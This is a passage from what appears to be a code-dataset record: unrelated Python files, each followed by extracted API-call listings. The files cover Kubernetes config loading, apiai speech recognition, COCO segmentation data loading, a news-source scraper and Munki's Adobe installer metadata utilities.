'(digits=labels[task - 1], conv=False)\n', (3800, 3837), False, 'from notmnist import load_notmnist\n'), ((4089, 4147), 'generator.generator_head', 'generator_head', (['dimZ', 'dimH', 'n_layers_head', "('gen_%d' % task)"], {}), "(dimZ, dimH, n_layers_head, 'gen_%d' % task)\n", (4103, 4147), False, 'from generator import generator_head, generator_shared, generator, construct_gen\n'), ((4378, 4455), 'eval_test_ll.construct_eval_func', 'construct_eval_func', (['X_ph', 'enc', 'dec', 'll', 'batch_size_ph'], {'K': '(100)', 'sample_W': '(False)'}), '(X_ph, enc, dec, ll, batch_size_ph, K=100, sample_W=False)\n', (4397, 4455), False, 'from eval_test_ll import construct_eval_func\n'), ((4664, 4773), 'vae_si.construct_optimizer', 'construct_optimizer', (['X_ph', 'enc', 'dec', 'll', 'X_train.shape[0]', 'batch_size_ph', 'shared_prior_params', 'task', 'K_mc'], {}), '(X_ph, enc, dec, ll, X_train.shape[0], batch_size_ph,\n shared_prior_params, task, K_mc)\n', (4683, 4773), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((4881, 4911), 'vae_si.lowerbound', 'lowerbound', (['X_ph', 'enc', 'dec', 'll'], {}), '(X_ph, enc, dec, ll)\n', (4891, 4911), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((4930, 5005), 'vae_si.construct_optimizer', 'construct_optimizer', (['X_ph', 'batch_size_ph', 'bound', 'X_train.shape[0]', 'ewc_loss'], {}), '(X_ph, batch_size_ph, bound, X_train.shape[0], ewc_loss)\n', (4949, 5005), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((5188, 5218), 'vae_si.lowerbound', 'lowerbound', (['X_ph', 'enc', 'dec', 'll'], {}), '(X_ph, enc, dec, ll)\n', (5198, 5218), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((5237, 5316), 'vae_si.construct_optimizer', 'construct_optimizer', (['X_ph', 'batch_size_ph', 'bound', 'X_train.shape[0]', 'laplace_loss'], {}), '(X_ph, batch_size_ph, bound, X_train.shape[0], laplace_loss)\n', (5256, 5316), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((5348, 5408), 'vae_laplace.compute_fisher', 'compute_fisher', (['X_ph', 'batch_size_ph', 'bound', 'X_train.shape[0]'], {}), '(X_ph, batch_size_ph, bound, X_train.shape[0])\n', (5362, 5408), False, 'from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum\n'), ((5457, 5487), 'vae_si.lowerbound', 'lowerbound', (['X_ph', 'enc', 'dec', 'll'], {}), '(X_ph, enc, dec, ll)\n', (5467, 5487), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((5523, 5624), 'vae_si.construct_optimizer', 'construct_optimizer', (['X_ph', 'batch_size_ph', 'bound', 'X_train.shape[0]', 'si_reg', 'old_params_shared', 'lbd'], {}), '(X_ph, batch_size_ph, bound, X_train.shape[0], si_reg,\n old_params_shared, lbd)\n', (5542, 5624), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((6275, 6369), 'visualisation.plot_images', 'plot_images', (['x_gen_list[i]', 'shape_high', 'path', "(data_name + '_gen_task%d_%d' % (task, i + 1))"], {}), "(x_gen_list[i], shape_high, path, data_name + '_gen_task%d_%d' %\n (task, i + 1))\n", (6286, 6369), False, 'from visualisation import plot_images\n'), ((6687, 6722), 'numpy.concatenate', 'np.concatenate', (['[x_gen_all, tmp]', '(0)'], {}), '([x_gen_all, tmp], 0)\n', (6701, 6722), True, 'import numpy as np\n'), ((7409, 7472), 'vae_ewc.update_ewc_loss', 'update_ewc_loss', (['sess', 'ewc_loss', 'var_list', 'fisher', 'lbd', 'X_batch'], {}), '(sess, ewc_loss, var_list, fisher, lbd, X_batch)\n', (7424, 7472), False, 'from vae_ewc import update_ewc_loss, compute_fisher\n'), ((7712, 7778), 'vae_laplace.update_laplace_loss', 'update_laplace_loss', (['sess', 'F_accum', 'var_list', 'fisher', 'lbd', 'X_batch'], {}), '(sess, F_accum, var_list, fisher, lbd, X_batch)\n', (7731, 7778), False, 'from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum\n'), ((7910, 7956), 'onlinevi.update_shared_prior', 'update_shared_prior', (['sess', 'shared_prior_params'], {}), '(sess, shared_prior_params)\n', (7929, 7956), False, 'from onlinevi import construct_optimizer, init_shared_prior, update_shared_prior, update_q_sigma\n'), ((8007, 8027), 'onlinevi.update_q_sigma', 'update_q_sigma', (['sess'], {}), '(sess)\n', (8021, 8027), False, 'from onlinevi import construct_optimizer, init_shared_prior, update_shared_prior, update_q_sigma\n'), ((8182, 8268), 'vae_si.update_si_reg', 'update_si_reg', (['sess', 'si_reg', 'new_params_shared', 'old_params_shared', 'w_params_shared'], {}), '(sess, si_reg, new_params_shared, old_params_shared,\n w_params_shared)\n', (8195, 8268), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((4255, 4295), 'generator.construct_gen', 'construct_gen', (['dec', 'dimZ'], {'sampling': '(False)'}), '(dec, dimZ, sampling=False)\n', (4268, 4295), False, 'from generator import generator_head, generator_shared, generator, construct_gen\n'), ((5074, 5134), 'vae_laplace.compute_fisher', 'compute_fisher', (['X_ph', 'batch_size_ph', 'bound', 'X_train.shape[0]'], {}), '(X_ph, batch_size_ph, bound, X_train.shape[0])\n', (5088, 5134), False, 'from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum\n')] |
import logging
import os
import cltl.combot.infra.config.local as local_config
logger = logging.getLogger(__name__)
K8_CONFIG_DIR = "/cltl_k8_config"
K8_CONFIG = "config/k8.config"
class K8LocalConfigurationContainer(local_config.LocalConfigurationContainer):
@staticmethod
def load_configuration(config_file=local_config.CONFIG, additional_config_files=local_config.ADDITIONAL_CONFIGS,
k8_configs=K8_CONFIG_DIR, k8_config_file=K8_CONFIG):
configs = additional_config_files
try:
copy_k8_config(k8_configs, k8_config_file)
configs += [k8_config_file]
except OSError:
logger.warning("Could not load kubernetes config map from %s to %s", k8_configs, k8_config_file)
local_config.LocalConfigurationContainer.load_configuration(config_file, configs)
def copy_k8_config(k8_config_dir, k8_config_file):
k8_configs = tuple(file for file in os.listdir(k8_config_dir) if not file.startswith("."))
logger.debug("Found kubernetes config maps %s in %s", k8_configs, k8_config_dir)
k8_sections = {section: _read_config(k8_config_dir, section)
for section in k8_configs}
with open(k8_config_file, 'w') as k8_cfg:
logger.info("Writing %s", k8_cfg)
for section_name, section_values in k8_sections.items():
k8_cfg.write(f"[{section_name}]\n")
k8_cfg.write(section_values)
k8_cfg.write("\n")
def _read_config(k8_configs, config_file):
logger.info("Loading %s/%s", k8_configs, config_file)
with open(os.path.join(k8_configs, config_file)) as cfg:
return cfg.read() | [
"logging.getLogger",
"os.listdir",
"os.path.join",
"cltl.combot.infra.config.local.LocalConfigurationContainer.load_configuration"
] | [((90, 117), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (107, 117), False, 'import logging\n'), ((773, 858), 'cltl.combot.infra.config.local.LocalConfigurationContainer.load_configuration', 'local_config.LocalConfigurationContainer.load_configuration', (['config_file', 'configs'], {}), '(config_file,\n configs)\n', (832, 858), True, 'import cltl.combot.infra.config.local as local_config\n'), ((1591, 1628), 'os.path.join', 'os.path.join', (['k8_configs', 'config_file'], {}), '(k8_configs, config_file)\n', (1603, 1628), False, 'import os\n'), ((948, 973), 'os.listdir', 'os.listdir', (['k8_config_dir'], {}), '(k8_config_dir)\n', (958, 973), False, 'import os\n')] |
import json
import apiai
import speech_recognition as sr
def speechRecognition():
recog = sr.Recognizer()
with sr.Microphone() as source:
print("It's your cue")
audio = recog.listen(source)
i = True
while i is True:
try:
text = recog.recognize_google(audio)
i = False
speechPrediction(text)
except sr.UnknownValueError:
print("Please speak again")
except sr.RequestError:
print("Please check your connection")
def speechPrediction(text):
CLIENT_ACCESS_TOKEN = "<KEY>"
DEVELOPER_ACCESS_TOKEN = "cae2<PASSWORD>"
ai = apiai.ApiAI(CLIENT_ACCESS_TOKEN)
requests = ai.text_request()
requests.query = text
requests.lang = "en"
response = requests.getresponse()
print(response)
intent,room = JSONresponse(response)
return intent,room
def JSONresponse(response):
json_response = json.loads(response.read().decode('utf-8'))
intent= []
room= []
print(json_response)
print('...')
result = json_response['result']
intent = result['action']
print(intent)
room_result = result['parameters']
room = room_result['room']
print(room)
return intent,room
#speechRecognition()
| [
"speech_recognition.Recognizer",
"apiai.ApiAI",
"speech_recognition.Microphone"
] | [((96, 111), 'speech_recognition.Recognizer', 'sr.Recognizer', ([], {}), '()\n', (109, 111), True, 'import speech_recognition as sr\n'), ((650, 682), 'apiai.ApiAI', 'apiai.ApiAI', (['CLIENT_ACCESS_TOKEN'], {}), '(CLIENT_ACCESS_TOKEN)\n', (661, 682), False, 'import apiai\n'), ((121, 136), 'speech_recognition.Microphone', 'sr.Microphone', ([], {}), '()\n', (134, 136), True, 'import speech_recognition as sr\n')] |
# raise NotImplementedError("Did not check!")
"""MSCOCO Semantic Segmentation pretraining for VOC."""
import os
from tqdm import trange
from PIL import Image, ImageOps, ImageFilter
import numpy as np
import pickle
from gluoncv.data.segbase import SegmentationDataset
class COCOSegmentation(SegmentationDataset):
CAT_LIST = [0, 5, 2, 16, 9, 44, 6, 3, 17, 62, 21, 67, 18, 19, 4,
1, 64, 20, 63, 7, 72]
NUM_CLASS = 21
def __init__(self, root=os.path.expanduser('~/.mxnet/datasets/coco'),
split='train', mode=None, transform=None):
super(COCOSegmentation, self).__init__(root, split, mode, transform)
from pycocotools.coco import COCO
from pycocotools import mask
if split == 'train':
print('train set')
ann_file = os.path.join(root, 'annotations/instances_train2017.json')
ids_file = os.path.join(root, 'annotations/train_ids.mx')
self.root = os.path.join(root, 'train2017')
else:
print('val set')
ann_file = os.path.join(root, 'annotations/instances_val2017.json')
ids_file = os.path.join(root, 'annotations/val_ids.mx')
self.root = os.path.join(root, 'val2017')
self.coco = COCO(ann_file)
self.coco_mask = mask
if os.path.exists(ids_file):
with open(ids_file, 'rb') as f:
self.ids = pickle.load(f)
else:
ids = list(self.coco.imgs.keys())
self.ids = self._preprocess(ids, ids_file)
self.transform = transform
# self.root = os.path.join(root, 'train2017') if split == 'train' else \
# os.path.join(root, 'val2017')
def __getitem__(self, index):
coco = self.coco
img_id = self.ids[index]
img_metadata = coco.loadImgs(img_id)[0]
path = img_metadata['file_name']
img = Image.open(os.path.join(self.root, path)).convert('RGB')
cocotarget = coco.loadAnns(coco.getAnnIds(imgIds=img_id))
mask = Image.fromarray(self._gen_seg_mask(cocotarget, img_metadata['height'],
img_metadata['width']))
# synchrosized transform
if self.mode == 'train':
img, mask = self._sync_transform(img, mask)
elif self.mode == 'val':
img, mask = self._val_sync_transform(img, mask)
else:
assert self.mode == 'testval'
mask = self._mask_transform(mask)
# general resize, normalize and toTensor
if self.transform is not None:
img = self.transform(img)
return img, mask
def __len__(self):
return len(self.ids)
def _gen_seg_mask(self, target, h, w):
mask = np.zeros((h, w), dtype=np.uint8)
coco_mask = self.coco_mask
for instance in target:
rle = coco_mask.frPyObjects(instance['segmentation'], h, w)
m = coco_mask.decode(rle)
cat = instance['category_id']
if cat in self.CAT_LIST:
c = self.CAT_LIST.index(cat)
else:
continue
if len(m.shape) < 3:
mask[:, :] += (mask == 0) * (m * c)
else:
mask[:, :] += (mask == 0) * (((np.sum(m, axis=2)) > 0) * c).astype(np.uint8)
return mask
def _preprocess(self, ids, ids_file):
print("Preprocessing mask, this will take a while." + \
"But don't worry, it only run once for each split.")
tbar = trange(len(ids))
new_ids = []
for i in tbar:
img_id = ids[i]
cocotarget = self.coco.loadAnns(self.coco.getAnnIds(imgIds=img_id))
img_metadata = self.coco.loadImgs(img_id)[0]
mask = self._gen_seg_mask(cocotarget, img_metadata['height'],
img_metadata['width'])
# more than 1k pixels
if (mask > 0).sum() > 1000:
new_ids.append(img_id)
tbar.set_description('Doing: {}/{}, got {} qualified images'. \
format(i, len(ids), len(new_ids)))
print('Found number of qualified images: ', len(new_ids))
with open(ids_file, 'wb') as f:
pickle.dump(new_ids, f)
return new_ids
@property
def classes(self):
"""Category names."""
return ('background', 'airplane', 'bicycle', 'bird', 'boat', 'bottle',
'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse',
'motorcycle', 'person', 'potted-plant', 'sheep', 'sofa', 'train',
'tv')
| [
"os.path.exists",
"pickle.dump",
"os.path.join",
"pycocotools.coco.COCO",
"pickle.load",
"numpy.sum",
"numpy.zeros",
"os.path.expanduser"
] | [((471, 515), 'os.path.expanduser', 'os.path.expanduser', (['"""~/.mxnet/datasets/coco"""'], {}), "('~/.mxnet/datasets/coco')\n", (489, 515), False, 'import os\n'), ((1266, 1280), 'pycocotools.coco.COCO', 'COCO', (['ann_file'], {}), '(ann_file)\n', (1270, 1280), False, 'from pycocotools.coco import COCO\n'), ((1322, 1346), 'os.path.exists', 'os.path.exists', (['ids_file'], {}), '(ids_file)\n', (1336, 1346), False, 'import os\n'), ((2767, 2799), 'numpy.zeros', 'np.zeros', (['(h, w)'], {'dtype': 'np.uint8'}), '((h, w), dtype=np.uint8)\n', (2775, 2799), True, 'import numpy as np\n'), ((816, 874), 'os.path.join', 'os.path.join', (['root', '"""annotations/instances_train2017.json"""'], {}), "(root, 'annotations/instances_train2017.json')\n", (828, 874), False, 'import os\n'), ((898, 944), 'os.path.join', 'os.path.join', (['root', '"""annotations/train_ids.mx"""'], {}), "(root, 'annotations/train_ids.mx')\n", (910, 944), False, 'import os\n'), ((969, 1000), 'os.path.join', 'os.path.join', (['root', '"""train2017"""'], {}), "(root, 'train2017')\n", (981, 1000), False, 'import os\n'), ((1067, 1123), 'os.path.join', 'os.path.join', (['root', '"""annotations/instances_val2017.json"""'], {}), "(root, 'annotations/instances_val2017.json')\n", (1079, 1123), False, 'import os\n'), ((1147, 1191), 'os.path.join', 'os.path.join', (['root', '"""annotations/val_ids.mx"""'], {}), "(root, 'annotations/val_ids.mx')\n", (1159, 1191), False, 'import os\n'), ((1216, 1245), 'os.path.join', 'os.path.join', (['root', '"""val2017"""'], {}), "(root, 'val2017')\n", (1228, 1245), False, 'import os\n'), ((4285, 4308), 'pickle.dump', 'pickle.dump', (['new_ids', 'f'], {}), '(new_ids, f)\n', (4296, 4308), False, 'import pickle\n'), ((1419, 1433), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (1430, 1433), False, 'import pickle\n'), ((1915, 1944), 'os.path.join', 'os.path.join', (['self.root', 'path'], {}), '(self.root, path)\n', (1927, 1944), False, 'import os\n'), ((3294, 3311), 'numpy.sum', 'np.sum', (['m'], {'axis': '(2)'}), '(m, axis=2)\n', (3300, 3311), True, 'import numpy as np\n')] |
# __author__ = 'sree'
import urllib2
from lxml import html
import requests
def get_page_tree(url=None):
page = requests.get(url=url, verify=False)
return html.fromstring(page.text)
def get_title(url=None):
tree = get_page_tree(url=url)
return tree.xpath('//title//text()')[0].strip().split(' -')[0]
def find_other_news_sources(url=None, title=None):
# Google forwards the url using <google_domain>/url?q=<actual_link>. This might change over time
forwarding_identifier = '/url?q='
if not title:
title = get_title(url=url)
parent_url_exclude = '-site:' + url
google_news_search_url = 'http://www.google.com/search?q=' + urllib2.quote(title) + parent_url_exclude + '&tbm=nws'
google_news_search_tree = get_page_tree(url=google_news_search_url)
other_news_sources_links = [a_link.replace(forwarding_identifier, '').split('&')[0] for a_link in
google_news_search_tree.xpath('//a//@href') if forwarding_identifier in a_link]
return other_news_sources_links
| [
"lxml.html.fromstring",
"urllib2.quote",
"requests.get"
] | [((117, 152), 'requests.get', 'requests.get', ([], {'url': 'url', 'verify': '(False)'}), '(url=url, verify=False)\n', (129, 152), False, 'import requests\n'), ((164, 190), 'lxml.html.fromstring', 'html.fromstring', (['page.text'], {}), '(page.text)\n', (179, 190), False, 'from lxml import html\n'), ((668, 688), 'urllib2.quote', 'urllib2.quote', (['title'], {}), '(title)\n', (681, 688), False, 'import urllib2\n')] |
# encoding: utf-8
# Copyright 2009-2020 <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
adobeutils.adobeinfo
Created by <NAME> on 2017-01-06.
Utilities to get info about Adobe installers/uninstallers
"""
from __future__ import absolute_import, print_function
import os
import json
import sqlite3
from glob import glob
from xml.dom import minidom
from .. import osutils
from .. import pkgutils
def find_install_app(dirpath):
'''Searches dirpath and enclosed directories for Install.app.
Returns the path to the actual executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("Install.app"):
setup_path = os.path.join(path, "Contents", "MacOS", "Install")
if os.path.exists(setup_path):
return setup_path
return ''
def find_setup_app(dirpath):
'''Search dirpath and enclosed directories for Setup.app.
Returns the path to the actual executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("Setup.app"):
setup_path = os.path.join(path, "Contents", "MacOS", "Setup")
if os.path.exists(setup_path):
return setup_path
return ''
def find_adobepatchinstaller_app(dirpath):
'''Searches dirpath and enclosed directories for AdobePatchInstaller.app.
Returns the path to the actual executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("AdobePatchInstaller.app"):
setup_path = os.path.join(
path, "Contents", "MacOS", "AdobePatchInstaller")
if os.path.exists(setup_path):
return setup_path
return ''
def find_adobe_deployment_manager(dirpath):
'''Searches dirpath and enclosed directories for AdobeDeploymentManager.
Returns path to the executable.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith("pkg/Contents/Resources"):
dm_path = os.path.join(path, "AdobeDeploymentManager")
if os.path.exists(dm_path):
return dm_path
return ''
def find_acrobat_patch_app(dirpath):
'''Attempts to find an AcrobatPro patching application
in dirpath. If found, returns the path to the bundled
patching script.'''
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith(".app"):
# look for Adobe's patching script
patch_script_path = os.path.join(
path, 'Contents', 'Resources', 'ApplyOperation.py')
if os.path.exists(patch_script_path):
return path
return ''
def get_payload_info(dirpath):
'''Parses Adobe payloads, pulling out info useful to munki.
.proxy.xml files are used if available, or for CC-era updates
which do not contain one, the Media_db.db file, which contains
identical XML, is instead used.
CS3/CS4: contain only .proxy.xml
CS5/CS5.5/CS6: contain both
CC: contain only Media_db.db'''
payloadinfo = {}
# look for .proxy.xml file dir
if os.path.isdir(dirpath):
proxy_paths = glob(os.path.join(dirpath, '*.proxy.xml'))
if proxy_paths:
xmlpath = proxy_paths[0]
dom = minidom.parse(xmlpath)
# if there's no .proxy.xml we should hope there's a Media_db.db
else:
db_path = os.path.join(dirpath, 'Media_db.db')
if os.path.exists(db_path):
conn = sqlite3.connect(db_path)
cur = conn.cursor()
cur.execute("SELECT value FROM PayloadData WHERE "
"PayloadData.key = 'PayloadInfo'")
result = cur.fetchone()
cur.close()
if result:
info_xml = result[0].encode('UTF-8')
dom = minidom.parseString(info_xml)
else:
# no xml, no db, no payload info!
return payloadinfo
payload_info = dom.getElementsByTagName('PayloadInfo')
if payload_info:
installer_properties = payload_info[0].getElementsByTagName(
'InstallerProperties')
if installer_properties:
properties = installer_properties[0].getElementsByTagName(
'Property')
for prop in properties:
if 'name' in list(prop.attributes.keys()):
propname = prop.attributes['name'].value.encode('UTF-8')
propvalue = ''
for node in prop.childNodes:
propvalue += node.nodeValue
if propname == 'AdobeCode':
payloadinfo['AdobeCode'] = propvalue
if propname == 'ProductName':
payloadinfo['display_name'] = propvalue
if propname == 'ProductVersion':
payloadinfo['version'] = propvalue
installmetadata = payload_info[0].getElementsByTagName(
'InstallDestinationMetadata')
if installmetadata:
totalsizes = installmetadata[0].getElementsByTagName(
'TotalSize')
if totalsizes:
installsize = ''
for node in totalsizes[0].childNodes:
installsize += node.nodeValue
payloadinfo['installed_size'] = int(int(installsize)/1024)
return payloadinfo
def get_adobe_setup_info(installroot):
'''Given the root of mounted Adobe DMG,
look for info about the installer or updater'''
info = {}
payloads = []
# look for all the payloads folders
for (path, dummy_dirs, dummy_files) in os.walk(installroot):
if path.endswith('/payloads'):
driverfolder = ''
media_signature = ''
setupxml = os.path.join(path, 'setup.xml')
if os.path.exists(setupxml):
dom = minidom.parse(setupxml)
drivers = dom.getElementsByTagName('Driver')
if drivers:
driver = drivers[0]
if 'folder' in list(driver.attributes.keys()):
driverfolder = driver.attributes[
'folder'].value.encode('UTF-8')
if driverfolder == '':
# look for mediaSignature (CS5 AAMEE install)
setup_elements = dom.getElementsByTagName('Setup')
if setup_elements:
media_signature_elements = setup_elements[
0].getElementsByTagName('mediaSignature')
if media_signature_elements:
element = media_signature_elements[0]
for node in element.childNodes:
media_signature += node.nodeValue
for item in osutils.listdir(path):
payloadpath = os.path.join(path, item)
payloadinfo = get_payload_info(payloadpath)
if payloadinfo:
payloads.append(payloadinfo)
if ((driverfolder and item == driverfolder) or
(media_signature and
payloadinfo['AdobeCode'] == media_signature)):
info['display_name'] = payloadinfo['display_name']
info['version'] = payloadinfo['version']
info['AdobeSetupType'] = 'ProductInstall'
if not payloads:
# look for an extensions folder; almost certainly this is an Updater
for (path, dummy_dirs, dummy_files) in os.walk(installroot):
if path.endswith("/extensions"):
for item in osutils.listdir(path):
#skip LanguagePacks
if item.find("LanguagePack") == -1:
itempath = os.path.join(path, item)
payloadinfo = get_payload_info(itempath)
if payloadinfo:
payloads.append(payloadinfo)
# we found an extensions dir,
# so no need to keep walking the install root
break
if payloads:
if len(payloads) == 1:
info['display_name'] = payloads[0]['display_name']
info['version'] = payloads[0]['version']
else:
if 'display_name' not in info:
info['display_name'] = "ADMIN: choose from payloads"
if 'version' not in info:
info['version'] = "ADMIN please set me"
info['payloads'] = payloads
installed_size = 0
for payload in payloads:
installed_size = installed_size + payload.get('installed_size', 0)
info['installed_size'] = installed_size
return info
def get_adobe_package_info(installroot):
'''Gets the package name from the AdobeUberInstaller.xml file;
other info from the payloads folder'''
info = get_adobe_setup_info(installroot)
info['description'] = ""
installerxml = os.path.join(installroot, "AdobeUberInstaller.xml")
if os.path.exists(installerxml):
description = ''
dom = minidom.parse(installerxml)
installinfo = dom.getElementsByTagName("InstallInfo")
if installinfo:
packagedescriptions = \
installinfo[0].getElementsByTagName("PackageDescription")
if packagedescriptions:
prop = packagedescriptions[0]
for node in prop.childNodes:
description += node.nodeValue
if description:
description_parts = description.split(' : ', 1)
info['display_name'] = description_parts[0]
if len(description_parts) > 1:
info['description'] = description_parts[1]
else:
info['description'] = ""
return info
else:
installerxml = os.path.join(installroot, "optionXML.xml")
if os.path.exists(installerxml):
dom = minidom.parse(installerxml)
installinfo = dom.getElementsByTagName("InstallInfo")
if installinfo:
pkgname_elems = installinfo[0].getElementsByTagName(
"PackageName")
if pkgname_elems:
prop = pkgname_elems[0]
pkgname = ""
for node in prop.childNodes:
pkgname += node.nodeValue
info['display_name'] = pkgname
if not info.get('display_name'):
info['display_name'] = os.path.basename(installroot)
return info
def get_xml_text_element(dom_node, name):
'''Returns the text value of the first item found with the given
tagname'''
value = None
subelements = dom_node.getElementsByTagName(name)
if subelements:
value = ''
for node in subelements[0].childNodes:
value += node.nodeValue
return value
def parse_option_xml(option_xml_file):
'''Parses an optionXML.xml file and pulls the items of interest, returning
them in a dictionary'''
info = {}
dom = minidom.parse(option_xml_file)
installinfo = dom.getElementsByTagName('InstallInfo')
if installinfo:
if 'id' in list(installinfo[0].attributes.keys()):
info['packager_id'] = installinfo[0].attributes['id'].value
if 'version' in list(installinfo[0].attributes.keys()):
info['packager_version'] = installinfo[
0].attributes['version'].value
info['package_name'] = get_xml_text_element(
installinfo[0], 'PackageName')
info['package_id'] = get_xml_text_element(installinfo[0], 'PackageID')
info['products'] = []
# CS5 to CC 2015.0-2015.2 releases use RIBS, and we retrieve a
# display name, version and 'mediaSignature' for building installs
# items. SAPCode is also stored so that we can later search by this
# key across both RIBS and HyperDrive installer metadata.
medias_elements = installinfo[0].getElementsByTagName('Medias')
if medias_elements:
media_elements = medias_elements[0].getElementsByTagName('Media')
if media_elements:
for media in media_elements:
product = {}
product['prodName'] = get_xml_text_element(
media, 'prodName')
product['prodVersion'] = get_xml_text_element(
media, 'prodVersion')
product['SAPCode'] = get_xml_text_element(media, 'SAPCode')
setup_elements = media.getElementsByTagName('Setup')
if setup_elements:
media_signature_elements = setup_elements[
0].getElementsByTagName('mediaSignature')
if media_signature_elements:
product['mediaSignature'] = ''
element = media_signature_elements[0]
for node in element.childNodes:
product['mediaSignature'] += node.nodeValue
info['products'].append(product)
# HD (HyperDrive) media for new mid-June 2016 products. We need the
# SAP codes, versions, and which ones are MediaType 'Product'. Support
# payloads seem to all be 'STI', and are listed as STIDependencies under
# the main product.
hd_medias_elements = installinfo[0].getElementsByTagName('HDMedias')
if hd_medias_elements:
hd_media_elements = hd_medias_elements[0].getElementsByTagName(
'HDMedia')
if hd_media_elements:
for hd_media in hd_media_elements:
product = {}
product['hd_installer'] = True
# productVersion is the 'full' version number
# prodVersion seems to be the "customer-facing" version for
# this update
# baseVersion is the first/base version for this standalone
# product/channel/LEID,
# not really needed here so we don't copy it
for elem in [
'mediaLEID',
'prodVersion',
'productVersion',
'SAPCode',
'MediaType',
'TargetFolderName']:
product[elem] = get_xml_text_element(hd_media, elem)
info['products'].append(product)
return info
def get_hd_installer_info(hd_payload_root, sap_code):
'''Attempts to extract some information from a HyperDrive payload
application.json file and return a reduced set in a dict'''
hd_app_info = {}
app_json_path = os.path.join(hd_payload_root, sap_code, 'Application.json')
json_info = json.loads(open(app_json_path, 'r').read())
# Copy some useful top-level keys, useful later for:
# - Name: display_name pkginfo key
# - ProductVersion: version pkginfo key and uninstall XML location
# - SAPCode: an uninstallXml for an installs item if it's a 'core' Type
# - BaseVersion and version: not currently used but may be useful once
# there are more HD installers in the future
for key in ['BaseVersion', 'Name', 'ProductVersion', 'SAPCode', 'version']:
hd_app_info[key] = json_info[key]
hd_app_info['SAPCode'] = json_info['SAPCode']
# Adobe puts an array of dicts in a dict with one key called 'Package'
pkgs = [pkg for pkg in json_info['Packages']['Package']]
hd_app_info['Packages'] = pkgs
return hd_app_info
def get_cs5_media_signature(dirpath):
'''Returns the CS5 mediaSignature for an AAMEE CS5 install.
dirpath is typically the root of a mounted dmg'''
payloads_dir = ""
# look for a payloads folder
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith('/payloads'):
payloads_dir = path
# return empty-handed if we didn't find a payloads folder
if not payloads_dir:
return ''
# now look for setup.xml
setupxml = os.path.join(payloads_dir, 'Setup.xml')
if os.path.exists(setupxml) and os.path.isfile(setupxml):
# parse the XML
dom = minidom.parse(setupxml)
setup_elements = dom.getElementsByTagName('Setup')
if setup_elements:
media_signature_elements = (
setup_elements[0].getElementsByTagName('mediaSignature'))
if media_signature_elements:
element = media_signature_elements[0]
elementvalue = ''
for node in element.childNodes:
elementvalue += node.nodeValue
return elementvalue
return ""
def get_cs5_uninstall_xml(option_xml_file):
'''Gets the uninstall deployment data from a CS5 installer'''
xml = ''
dom = minidom.parse(option_xml_file)
deployment_info = dom.getElementsByTagName('DeploymentInfo')
if deployment_info:
for info_item in deployment_info:
deployment_uninstall = info_item.getElementsByTagName(
'DeploymentUninstall')
if deployment_uninstall:
deployment_data = deployment_uninstall[0].getElementsByTagName(
'Deployment')
if deployment_data:
deployment = deployment_data[0]
xml += deployment.toxml('UTF-8')
return xml
def count_payloads(dirpath):
'''Attempts to count the payloads in the Adobe installation item.
Used for rough percent-done progress feedback.'''
count = 0
for (path, dummy_dirs, files) in os.walk(dirpath):
if path.endswith("/payloads"):
# RIBS-style installers
for subitem in osutils.listdir(path):
subitempath = os.path.join(path, subitem)
if os.path.isdir(subitempath):
count = count + 1
elif "/HD/" in path and "Application.json" in files:
# we're inside an HD installer directory. The payloads/packages
# are .zip files
zip_file_count = len(
[item for item in files if item.endswith(".zip")])
count = count + zip_file_count
return count
def get_adobe_install_info(installdir):
'''Encapsulates info used by the Adobe Setup/Install app.'''
adobe_install_info = {}
if installdir:
adobe_install_info['media_signature'] = get_cs5_media_signature(
installdir)
adobe_install_info['payload_count'] = count_payloads(installdir)
option_xml_file = os.path.join(installdir, "optionXML.xml")
if os.path.exists(option_xml_file):
adobe_install_info['uninstallxml'] = get_cs5_uninstall_xml(
option_xml_file)
return adobe_install_info
# Disable PyLint complaining about 'invalid' camelCase names
# pylint: disable=invalid-name
def getAdobeCatalogInfo(mountpoint, pkgname=""):
'''Used by makepkginfo to build pkginfo data for Adobe
installers/updaters'''
# look for AdobeDeploymentManager (AAMEE installer)
deploymentmanager = find_adobe_deployment_manager(mountpoint)
if deploymentmanager:
dirpath = os.path.dirname(deploymentmanager)
option_xml_file = os.path.join(dirpath, 'optionXML.xml')
option_xml_info = {}
if os.path.exists(option_xml_file):
option_xml_info = parse_option_xml(option_xml_file)
cataloginfo = get_adobe_package_info(dirpath)
if cataloginfo:
# add some more data
if option_xml_info.get('packager_id') == u'CloudPackager':
# CCP package
cataloginfo['display_name'] = option_xml_info.get(
'package_name', 'unknown')
cataloginfo['name'] = cataloginfo['display_name'].replace(
' ', '')
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeCCPUninstaller"
cataloginfo['installer_type'] = "AdobeCCPInstaller"
cataloginfo['minimum_os_version'] = "10.6.8"
mediasignatures = [
item['mediaSignature']
for item in option_xml_info.get('products', [])
if 'mediaSignature' in item]
else:
# AAMEE package
